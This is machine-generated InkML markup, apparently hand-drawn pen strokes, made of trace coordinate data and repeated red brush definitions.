0,-4-9 0,-19-37-42,23 46 0,0 1 0,1-1 0,0-1 0,1 1 0,0-1 0,-4-20 0,6 20 0,0-4 0,0 0 0,0 0 0,-2 0 0,0 1 0,0 0 0,-2-1 0,-9-19 0,11 31 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 1 0,-1-1 0,1 1 0,0 0 0,-1 1 0,0-1 0,1 1 0,-1 0 0,0 0 0,1 0 0,-1 1 0,0-1 0,-7 1 0,-27-5 0,-2-1 0,-1 1 0,1 2 0,-83 4 0,36 1 0,-346-2 0,401 2-80,-49 8 0,-24 2-455,85-12 535,-5 0 0,0 1 0,0 1 0,-49 11 0,7 3-481,-1-3 0,-138 8 0,123-13 451,-131 31 1,97-14-1771,-467 71 1800,328-50 0,136-29-150,-95 11-214,160-20 505,-57 16 0,58-11-1,-57 6-1,10-15-140,74-4 45,0 1-1,-1 1 1,1 1 0,-40 11-1,31-6-32,-1-1-1,0-2 1,0-2-1,-1-2 1,-43-3-1,29 0-99,-94 10 1,-85 8 88,44-5 0,-155 10-1945,250-11 2043,-167 13 383,3-2-481,84 2 135,35-3-38,-50 1-97,125-11 296,38-5 249,-39 1 0,63-6-477,-2 0 48,0 0-1,-1 0 1,1 0 0,0 1 0,-1-1-1,1 1 1,0-1 0,0 1 0,-1 0-1,1 1 1,0-1 0,0 0-1,-5 4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8.657"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">2 1 24575,'0'33'0,"-2"0"0,2 0 0,2-1 0,1 1 0,1 0 0,2-1 0,11 35 0,-11-46 0,-1 1 0,4 31 0,-2-7 0,5 26 0,-5-28 0,13 46 0,13 55 0,-5-23 0,-11-39-204,5 17-488,-9-50 692,9 83 0,-18-106 0,1 34 5,-5-46 119,1 1 0,1 0-1,1-1 1,0 1-1,8 23 1,-4-19-10,-5-12-111,1-1 0,-1 0 0,1 1 0,1-1 0,-1 0 0,1-1 0,1 1 0,-1-1-1,1 0 1,0 0 0,8 7 0,-13-12-6,1-1 1,-1 1-1,0-1 0,1 0 0,-1 1 0,1-1 1,-1 0-1,1 0 0,-1 0 0,1 1 1,-1-1-1,1 0 0,-1 0 0,1 0 0,-1 0 1,1 0-1,0 0 0,-1 0 0,1 0 0,-1 0 1,1 0-1,-1 0 0,1 0 0,-1 0 0,1 0 1,-1-1-1,1 1 0,-1 0 0,1 0 0,-1 0 1,1-1-1,8-17 197,-5-28-1258,-4 43 658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35.733"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 2 24575,'47'0'0,"-10"-1"0,1 2 0,-1 1 0,51 9 0,-49-5 0,0-1 0,0-3 0,66-4 0,-34 1 0,561 0-1365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1.408"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">834 1 24575,'0'33'0,"-2"-1"0,-10 54 0,6-60 0,-1 0 0,-1 0 0,-2-1 0,-1 0 0,0-1 0,-25 38 0,-6 7-21,27-40-77,-3 0-1,0-2 1,-1 0-1,-26 26 0,-47 52-29,12-14 154,48-53-36,-52 78 0,52-69-517,14-22-639,-127 196-601,132-197 3122,2 2-1,-15 46 1,17-42-2022,-22 45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1.837"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">89 1 24575,'-1'0'0,"0"0"0,0 0 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 0 0,1 1 0,-1-1 0,0 0 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,0 0 0,-1-1 0,1 1 0,0 0 0,-1-1 0,1 1 0,0 1 0,-5 23 0,4-19 0,-19 159 0,15-112 0,-4 13 0,4-38 0,-2 50 0,-4 39 0,6-78 0,0 46 0,4-2 0,3 99 0,2-154 0,2-1 0,0 1 0,2-1 0,1 0 0,22 44 0,-15-42 0,0-2 0,34 42 0,-31-44 0,-2-5 0,1 0 0,0-1 0,2-1 0,0 0 0,1-2 0,1-1 0,36 20 0,4-9 0,-15-8 0,-37-14 0,1 0 0,-1-1 0,0 0 0,1-1 0,0 0 0,17 1 0,71-5 0,-40 0 0,-54 2-85,0 0 0,0 0-1,1-1 1,-1 0 0,0 0-1,0 0 1,1 0 0,-1-1-1,0 0 1,0 0 0,-1 0-1,1 0 1,0-1 0,-1 0-1,8-6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2.453"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">734 0 24575,'-18'1'0,"-1"1"0,1 0 0,0 1 0,0 1 0,-20 7 0,-85 38 0,117-47 0,-45 26 0,37-20 0,0 0 0,-19 8 0,2-4 0,2 2 0,0 2 0,0 0 0,2 2 0,0 1 0,1 1 0,-37 36 0,57-49 0,0 0 0,0 0 0,1 0 0,-1 1 0,2-1 0,-1 1 0,1 1 0,0-1 0,-3 11 0,-1-1 0,2 0 0,-1 1 0,-5 35 0,5-18 0,4-22 0,0 0 0,1 1 0,1 0 0,0 21 0,2-31 0,-1-1 0,1 1 0,0-1 0,0 0 0,1 1 0,-1-1 0,1 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,1-1 0,0 1 0,0-1 0,0 0 0,1 0 0,-1 0 0,5 3 0,19 11 0,1-1 0,0-1 0,1-1 0,34 11 0,13 8 0,15 6 0,-66-30 0,11 4 0,0-1 0,1-2 0,0-2 0,53 5 0,-52-8-1365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2.878"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 24575,'1'27'0,"2"-1"0,6 30 0,2 10 0,10 64 0,0-20 0,-14-66 0,-1-4 0,3 71 0,-9-84-115,-2-17-10,2 0 0,0 1 0,0-1 0,1 0 0,0 1 0,1-1 0,0 0 0,0 0 0,8 18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4.291"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">27 0 24575,'2'1'0,"0"-1"0,0 1 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,-1 1 0,1 0 0,0-1 0,-1 1 0,1 0 0,-1 0 0,1-1 0,-1 1 0,1 3 0,20 38 0,-17-23 0,-2 0 0,0 0 0,-1 0 0,-1 1 0,-1-1 0,-3 31 0,0 10 0,4-37 0,-2 0 0,-1 0 0,-9 43 0,4-40 0,0-2 0,1 0 0,1 1 0,-2 35 0,5-30 0,-6 34 0,3-36 0,-1 43 0,5-37 0,-1 0 0,-7 42 0,3-46 0,-1 35 0,7-57 0,-1 0 0,2 1 0,-1-1 0,1 0 0,1 1 0,-1-1 0,2 0 0,3 11 0,-5-17 0,1-1 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,1-1 0,0 0 0,-1 1 0,1-1 0,0 0 0,0-1 0,-1 1 0,1 0 0,0-1 0,6 1 0,8 0 0,0-1 0,29-2 0,-19 0 0,7 3 0,0 1 0,39 8 0,-18-2 0,-44-6 0,0 1 0,0 0 0,-1 0 0,15 8 0,16 5 0,-9-5 0,0 2 0,-2 1 0,42 26 0,-64-32 0,-19-9 0,-18-8 0,-8-4-455,0 3 0,-74-13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4.814"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">66 198 24575,'-1'-3'0,"0"0"0,0 0 0,0 0 0,-1 0 0,0 0 0,1 1 0,-1-1 0,0 0 0,0 1 0,0 0 0,-1-1 0,1 1 0,-6-4 0,-9-12 0,15 16 0,0 0 0,1 0 0,-1 0 0,0-1 0,1 1 0,0-1 0,0 1 0,-1-1 0,1 1 0,1-1 0,-1 0 0,0 0 0,1 1 0,-1-1 0,1 0 0,0 0 0,0 0 0,0 1 0,0-1 0,1 0 0,-1 0 0,1 0 0,0 1 0,-1-1 0,1 0 0,0 1 0,1-1 0,-1 1 0,0-1 0,1 1 0,-1 0 0,1-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,1-1 0,2-2 0,4-1 0,1 0 0,-1 1 0,1 0 0,0 0 0,0 1 0,0 0 0,0 1 0,0 0 0,19-1 0,-2 2 0,0 0 0,0 3 0,0 0 0,0 1 0,-1 2 0,34 10 0,-14-2 0,-24-6 0,40 16 0,-54-20 0,0 1 0,-1 1 0,0 0 0,0 0 0,0 0 0,-1 0 0,0 1 0,10 12 0,-9-10 0,-1 1 0,-1 0 0,1 0 0,-1 0 0,-1 1 0,0-1 0,0 1 0,-1 0 0,4 19 0,-4-1 0,-1 0 0,-2 39 0,0-55 0,0 37 0,0-1 0,-9 67 0,9-113 0,0 1 0,0-1 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,1-1 0,-1 1 0,0-1 0,1 1 0,0-1 0,-1 0 0,1 0 0,0 1 0,-1-1 0,1 0 0,0-1 0,4 3 0,6 2 0,2-1 0,-1 0 0,22 3 0,-6-1 0,27 10 84,-8-2-454,94 14 1,-12-9 369,-72-9 0,119 4 0,-163-14 14,-7 1 63,1-1 1,0-1-1,0 1 1,0-1-1,-1 0 1,14-5-1,-19 5-73,0 0-1,0 0 0,0 0 1,0 0-1,-1-1 1,1 1-1,0-1 1,-1 1-1,1-1 0,-1 0 1,1 1-1,-1-1 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 1,0 0-1,-1 0 1,1 0-1,-1-1 0,1 1 1,-1 0-1,0 0 1,0-1-1,0 1 0,0 0 1,0-4-1,-2-1-127,0-1 0,0 0 0,0 1 0,-1 0 0,0-1 0,-1 1-1,1 0 1,-2 1 0,1-1 0,-9-10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7.843"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1375 91 24575,'-128'2'0,"-137"-5"0,122-17-415,93 10 99,-89-3 0,61 13 300,29 1-28,1-2 0,-79-11-1,94 7 184,1 3 0,-63 1-1,-22 0 642,109-1-876,0 0 0,1 0 0,-1 0 0,0-1 0,1 0 0,-11-6 0,12 6-597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8.302"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">24 1 24575,'1'0'0,"0"0"0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,-1 1 0,1 0 0,0-1 0,0 1 0,-1 0 0,1 0 0,0 0 0,-1-1 0,1 1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 2 0,4 33 0,-4-32 0,4 77 0,-8 102 0,0-154 0,-13 51 0,11-56 0,0 0 0,2 1 0,-2 32 0,5-35 0,0 2 0,4 38 0,-2-55 0,0 0 0,1 0 0,-1 0 0,1 0 0,1 0 0,0 0 0,0 0 0,0-1 0,7 11 0,7 9 0,24 50 0,-29-52 0,0-1 0,1-1 0,22 28 0,11 11 17,-32-39-234,2-2 0,31 32 0,-17-23 135,176 160 37,-188-177 45,-1 0 0,2-1 0,-1 0 0,1-2 0,39 14 0,36 18 0,-66-27-12,1-2 0,0 0 0,0-3 0,1 0 0,0-2 0,54 6 0,-74-11 178,0 0 0,0 0 1,-1 1-1,14 5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1.586"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 0 24575,'0'6'0,"1"0"0,0 0 0,0 0 0,1 0 0,0 0 0,0 0 0,0 0 0,1-1 0,3 6 0,34 51 0,-27-45 0,11 20 0,-2 1 0,-1 1 0,28 74 0,-16-13 0,-18-53 0,36 80 0,-12-37 0,-39-90 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,1 0 0,-1-1 0,0 1 0,0 0 0,0-1 0,1 1 0,-1 0 0,0 0 0,0-1 0,1 1 0,-1 0 0,0 0 0,0-1 0,1 1 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0-1 0,1 1 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 1 0,0-1 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 1 0,0-1 0,1 0 0,-1 0 0,0 1 0,0-1 0,1 0 0,-1 0 0,0 1 0,0-1 0,0 0 0,1 1 0,-1-1 0,0 0 0,0 1 0,0-1 0,0 0 0,0 1 0,1 0 0,6-39 0,-5 26 0,2-6-1365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9.184"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 679 24575,'20'-23'0,"-16"18"0,1 0 0,-1 0 0,1 0 0,8-6 0,1-2 0,0 0 0,-2-1 0,1 0 0,-2-1 0,0 0 0,0 0 0,7-18 0,1 1 0,-9 14 0,-2-1 0,0 0 0,-1 0 0,-1 0 0,-1-1 0,4-27 0,12-44 0,-16 74 0,-2-1 0,0 0 0,-1 0 0,0-1 0,-2 1 0,-2-33 0,1 49 0,1-1 0,-1 1 0,1 0 0,-1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,-1 0 0,0 1 0,1-1 0,-1 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,-1 1 0,1-1 0,0 0 0,0 1 0,-1-1 0,-2 1 0,-6-1 0,-1 0 0,1 1 0,-1 0 0,-19 3 0,28-2 0,0-1 0,1 1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 1 0,-1-1 0,1 1 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,0 2 0,1-1 0,-1 0 0,1 0 0,-1 0 0,1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,1 0 0,0 3 0,-1 10 0,1-1 0,0 0 0,5 30 0,-5-45 0,5 25 0,2-1 0,0 0 0,2-1 0,22 44 0,-15-33 0,6 18 0,-2 2 0,13 57 0,-25-79 0,1 3 0,14 36 0,-22-68 0,1-1 0,-1 1 0,1-1 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,1 1 0,-1-1 0,0 1 0,1-1 0,0 0 0,3 1 0,53 11 0,-35-9 0,34 6-1365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1.953"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 0 24575,'2'18'0,"1"-1"0,0 0 0,1 0 0,1-1 0,1 1 0,1-1 0,8 17 0,5 12 0,-3-4 0,-4-10 0,-1 1 0,9 37 0,-14-43 0,1-1 0,2-1 0,12 25 0,-8-19 0,11 34 0,-5-13 0,-13-33 0,0 1 0,5 22 0,-6-19 0,2 0 0,0-1 0,1 1 0,15 22 0,2 8 0,75 150 0,-91-173 0,-8-24 0,-1-1 0,0 1 0,1-1 0,0 1 0,0-1 0,0 0 0,5 7 0,-7-11 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 1 0,1-1 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1-1 0,-1 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,1 0 0,-1 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,-1 1 0,1 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,-1 0 0,0-14 0,-35-188-1365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2.381"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 2 24575,'85'-1'0,"91"3"0,-172-1 0,0-1 0,0 1 0,-1 0 0,1 0 0,0 0 0,-1 1 0,1-1 0,-1 1 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 1 0,0-1 0,-1 1 0,1 0 0,0-1 0,2 5 0,2 5 0,0 0 0,-1 0 0,9 23 0,-1-1 0,-7-18 0,-1 1 0,0 0 0,-1 1 0,-1-1 0,0 1 0,-2 0 0,0 0 0,0 25 0,-3-37 0,0 0 0,0-1 0,-1 1 0,0 0 0,0-1 0,0 0 0,-1 1 0,1-1 0,-1 0 0,0 0 0,-1-1 0,-5 7 0,-6 6 0,-34 27 0,11-10 0,27-24-1365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3.125"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 1 24575,'2'0'0,"1"0"0,0 0 0,0 1 0,-1-1 0,1 1 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,-1-1 0,1 3 0,4 8 0,-1 0 0,-1 0 0,5 27 0,-1-5 0,-3-11 0,0-1 0,-2 1 0,-1-1 0,0 29 0,1 18 0,9-3 0,-3-25 0,-9-41 7,0 1-1,0-1 0,1 0 0,-1 0 1,0 1-1,0-1 0,1 0 1,-1 0-1,1 0 0,-1 0 1,1 1-1,0-1 0,-1 0 0,1 0 1,0 0-1,0 0 0,-1-1 1,2 2-1,-1-2-52,0 0-1,-1-1 1,1 1-1,-1 0 1,1-1 0,0 1-1,-1-1 1,1 1-1,-1-1 1,1 1-1,-1-1 1,0 1 0,1-1-1,-1 1 1,1-1-1,-1 0 1,0 1 0,0-1-1,1 0 1,-1 1-1,0-1 1,0 0 0,0 1-1,0-1 1,1 0-1,-1 1 1,0-1 0,0 0-1,-1 0 1,1 1-1,0-2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3.488"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 24575,'0'4'0,"0"5"0,0 4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3.898"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">2 0 24575,'0'20'0,"-1"-10"0,1 1 0,0-1 0,1 0 0,0 1 0,0-1 0,1 0 0,0 0 0,1 0 0,0 0 0,7 14 0,0-3 0,-2-1 0,0 1 0,6 29 0,-2-8 0,1 9 0,-9-33 0,0 0 0,2-1 0,8 20 0,8 19 0,30 110 0,-2-1 0,-39-129 0,-2 1 0,-1 0 0,-2 1 0,2 63 0,-4-47 0,15 93 0,-7-56 0,-7-60 0,1 47 0,-5-46 0,-3 64 0,2-94 0,0-1 0,0 0 0,0 0 0,-1 1 0,1-1 0,0 0 0,-1 0 0,1 1 0,0-1 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 1 0,-1 0 0,2-1 0,-1-1 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,-1 0 0,1 0 0,-1 0 0,1-1 0,-1 1 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1-1 0,1 1 0,0 0 0,-1 0 0,1-1 0,-1 1 0,0-1 0,-2-2 0,0 0 0,0-1 0,0 1 0,0-1 0,1 0 0,-4-6 0,-39-97 112,-3-6-1589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4.292"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">126 0 24575,'60'46'0,"-27"-18"0,-28-25 0,0 0 0,0 1 0,-1-1 0,1 1 0,-1 0 0,0 0 0,0 1 0,-1-1 0,1 1 0,-1 0 0,0-1 0,0 2 0,-1-1 0,0 0 0,1 0 0,0 7 0,11 39 0,2 0 0,38 79 0,-47-113 0,-3-7 0,0 1 0,-1 0 0,0 0 0,-1 0 0,-1 1 0,1 13 0,-4 72 0,0-36 0,2-53 0,-1 0 0,0 0 0,-1 0 0,0 0 0,0-1 0,0 1 0,-1-1 0,-5 10 0,-36 57 0,9-19 0,18-26-41,-1-1-1,-1-1 1,-2-1 0,-26 27-1,-103 84-1689,135-124 1466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5.193"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 1 24575,'4'0'0,"1"1"0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,-1 1 0,1-1 0,-1 1 0,1 0 0,-1 0 0,0 0 0,0 0 0,5 8 0,5 7 0,-1 0 0,15 33 0,-7-13 0,43 50 0,-42-61 0,22 37 0,-46-62-96,-7-4 263,-14-8-707,20 9-356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5.540"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 0 24575,'3'0'0,"6"0"0,0 4 0,0 4 0,1 2 0,-1 2 0,2 3 0,-1 2 0,2-1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5.888"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 24575,'1'6'0,"0"0"0,0-1 0,1 1 0,-1 0 0,1-1 0,1 0 0,-1 0 0,1 1 0,0-1 0,0-1 0,5 8 0,17 31 0,15 77 0,14 34 0,-42-119-159,14 65 1,-19-68 35,1 0 1,20 51 0,-20-61 122,-1 0 0,-1 1 0,-2-1 0,0 1 0,-1 0 0,-1 0 0,-2 30 0,6 49 0,23 233-2272,-24-245 2326,-6 93 1,2 73 631,4-220 395,20 70-1,-25-106-1080,0 1 0,0-1 0,1 0 0,-1 1 0,0-1 0,0 0 0,0 1 0,0-1 0,1 0 0,-1 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,-1 1 0,1-1 0,0 0 0,0 1 0,0-1 0,0 0 0,-1 1 0,1-1 0,0 1 0,0-1 0,-1 0 0,1 1 0,-12-9 0,-11-19 0,18 18-195,0 1 0,0-1 0,1 0 0,0-1 0,0 1 0,-3-13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9:06.220"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 26 24575,'46'-17'0,"-3"12"0,1 1 0,83 6 0,-38 0 0,-58-2 0,-8-1 0,0 1 0,43 7 0,-58-6 0,0 1 0,0 1 0,-1-1 0,1 1 0,-1 0 0,0 1 0,0 0 0,0 0 0,-1 0 0,1 1 0,-1 0 0,8 8 0,48 48 0,-38-40 0,-1 2 0,-1 1 0,-1 1 0,36 53 0,-51-66 0,11 18 0,21 49 0,14 31 0,-42-82 0,-2 0 0,-1 1 0,-1-1 0,-1 1 0,-2 1 0,0 41 0,-3-59 0,0 1 0,-1 0 0,0-1 0,-1 1 0,0-1 0,-1 1 0,-1-1 0,0 0 0,0 0 0,-1-1 0,-1 1 0,0-1 0,0 0 0,-1-1 0,-1 1 0,1-1 0,-2-1 0,-17 17 0,10-11 0,-1-1 0,0-1 0,-1-1 0,0 0 0,-1-1 0,-37 15 0,34-17 0,0 0 0,1 1 0,0 1 0,1 1 0,0 1 0,1 1 0,0 0 0,1 1 0,-18 21 0,23-24 0,-1-1 0,0 0 0,-1-1 0,0 0 0,0-2 0,-1 1 0,0-2 0,-18 6 0,-25 1-1365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9.689"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 1 24575,'1'10'0,"1"0"0,1 0 0,-1 0 0,9 18 0,-7-17 0,33 121 0,-3-6 0,-29-112 0,-2 0 0,4 26 0,-24-161 0,15 109-151,0 0-1,1 0 0,0 0 0,1 0 1,1 0-1,0-1 0,0 1 1,5-16-1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8.461"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
